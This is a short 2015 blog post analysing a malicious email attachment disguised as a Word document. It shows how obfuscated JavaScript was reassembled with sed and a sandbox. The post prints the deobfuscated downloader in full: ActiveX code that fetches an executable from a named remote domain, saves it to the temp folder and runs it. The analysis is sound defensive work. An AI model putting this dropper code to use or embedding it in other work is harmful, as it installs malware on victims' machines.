Friday, February 20, 2015

Deobfuscating Javascript

Today I came across some javascript madness inside of a file that initially appears as a Word Document in an email.  Below is a picture of some of the madness:

var a=''; var b=''; function lq() { b = 'eval'; a += 'ADODB'; tqk(); }; function j() { b = 'eval'; a += 's.Exp'; eky(); }; function ye() { b = 'eval'; a += 'ti'; xk(); }; function rbx() { b = 'eval'; a += '357'; dke(); }; function mx() { b = 'eval'; a += 'ment'; fr(); }; function jp() { b = 'eval'; a += '+St'; rxh(); }; function uuz() { b = 'eval'; a += ' ca'; d(); };

As you can tell little pieces of the actual code scattered everywhere.  To first deobfuscate the code I placed a line break between each semi-colon and new function.

cat file.txt | sed 's/function/\nfunction/g'

The above command just does a string substitution adding a new line in before the function call.  Then I noticed the variable b='eval' never changes.  So I removed it from the functions using sed once again:

cat newfile.txt | sed "s/b = 'eval';//"

Then after the code is assembled I knew it would execute in some fashion so looking through the code I found a line of this[b](a);.  I modified the line in the code to read document.write(a) and then in a sandbox ran the javascript.

The output of the deofuscated code came out to be the below code:

function dl(fr,fn,rn)
+++ var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+fn; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function() { if (xo.readyState === 4) { var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); xa.position = 0; xa.saveToFile(fn,2); xa.close(); }; }; try { xo.open("GET",fr,false); xo.send(); if (rn > 0) { ws.Run(fn,0,0); }; } catch (er) { }; }; dl("hyyp://cancumisa.com.mx/document.php?id=<random number>&rnd=<random number>","69923439.exe",1)

The above javascript will create a file in the temp directory using wscript called 69923439.exe if it can download the file located at the URL listed.

The goal of this post was to display the deobfuscation of the badness.




No comments:

Post a Comment

Prepare, Bait, Hook, Execute and Control - Buffer Overflows

This post is the third of four that I am planning to write about social engineering specifically about phishing.  The form of phishing that...